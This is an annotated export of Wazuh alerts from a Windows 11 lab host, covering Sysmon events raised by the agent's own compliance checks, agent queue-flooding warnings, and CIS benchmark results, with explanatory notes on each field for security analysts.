data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:44.314
ProcessGuid: {94294ddc-be64-680a-340c-000000000e00}
ProcessId: 14436
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be64-680a-320c-000000000e00}
ParentProcessId: 10704
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:44.314 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be64-680a-340c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14436 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be64-680a-320c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10704 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell process created an executable file in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92205 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534580.2332848 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:48.2996900Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291773 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:42:48.298
ProcessGuid: {94294ddc-be67-680a-3a0c-000000000e00}
ProcessId: 8604
Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_p4vcdh3q.d4n.ps1
CreationUtcTime: 2025-04-24 22:42:48.298
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:48.298 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be67-680a-3a0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8604 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_p4vcdh3q.d4n.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:42:48.298 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
🧠 What happened? C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
🔍 Why it's important: Critical or commonly abused ATT&CK technique
rule.description: C:\\Windows\\SysWOW64\\SecEdit.exe binary in a suspicious location launched by C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92066 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534584.2335549 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:49.7011971Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 292055 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:49.694
ProcessGuid: {94294ddc-be69-680a-3c0c-000000000e00}
ProcessId: 6028
Image: C:\Windows\SysWOW64\SecEdit.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Windows Security Configuration Editor Command Tool
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: SeCEdit
CommandLine: "C:\WINDOWS\system32\SecEdit.exe" /export /cfg C:\WINDOWS\TEMP/secexport.cfg
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=FB968BA2416A930CD06AC599A61A50569AAA846CA15D0880A5DB80A81CF1500A
ParentProcessGuid: {94294ddc-be67-680a-3a0c-000000000e00}
ParentProcessId: 8604
ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \"LSAAnonymousNameLookup\").ToString().Split(\"=\")[1].Trim()"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:49.694 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be69-680a-3c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 6028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\SecEdit.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows Security Configuration Editor Command Tool No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: SeCEdit No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\system32\\SecEdit.exe\" /export /cfg C:\\WINDOWS\\TEMP/secexport.cfg No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=FB968BA2416A930CD06AC599A61A50569AAA846CA15D0880A5DB80A81CF1500A No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be67-680a-3a0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8604 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: powershell \"$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\\"LSAAnonymousNameLookup\\\").ToString().Split(\\\"=\\\")[1].Trim()\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is full. Events may be lost. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 203 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534599.2342118 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'full'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: full Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is flooded. Check the agent configuration. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 204 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534615.2342364 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'flooded'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: flooded Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is full. Events may be lost. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 203 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534619.2342637 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'full'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: full Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is flooded. Check the agent configuration. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 204 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6.1'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534634.2342883 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'flooded'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: flooded Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from 'not applicable' to passed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19015 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['2.3.10.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534645.2343156 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26042 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting determines whether an anonymous user can request security identifier (SID) attributes for another user, or use a SID to obtain its corresponding user name. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: If this policy setting is enabled, a user with local access could use the well-known Administrator's SID to learn the real name of the built-in Administrator account, even if it has been renamed. That person could then use the account name to initiate a password guessing attack. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Security Options\Network access: Allow anonymous SID/Name translation Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 2.3.10.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\"LSAAnonymousNameLookup\\").ToString().Split(\\"=\\")[1].Trim()"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Special Logon' is set to include 'Success'.: Status changed from 'not applicable' to passed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19015 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.5.6'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534647.2346388 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26156 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Audit Special Logon' is set to include 'Success'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This subcategory reports when a special logon is used. A special logon is a logon that has administrator-equivalent privileges and can be used to elevate a process to a higher level. Events for this subcategory include: - 4964 : Special groups have been assigned to a new logon. The recommended state for this setting is to include: Success. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Auditing these events may be useful when investigating a security incident. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Logon/Logoff\Audit Special Logon Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 17.5.6 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 8.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.command: ['auditpol.exe /get /subcategory:"Special Logon"'] Shell/registry query used in the test – reproduce it yourself when verifying.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
data.sca.check.previous_result: not applicable Last run’s pass/fail – trend spotting for drift.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Detailed File Share' is set to include 'Failure'.: Status changed from 'not applicable' to failed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19014 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['17.6.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['3.3', '8.5'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534650.2349020 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26157 Unique ID for this single check – copy to search historic runs.
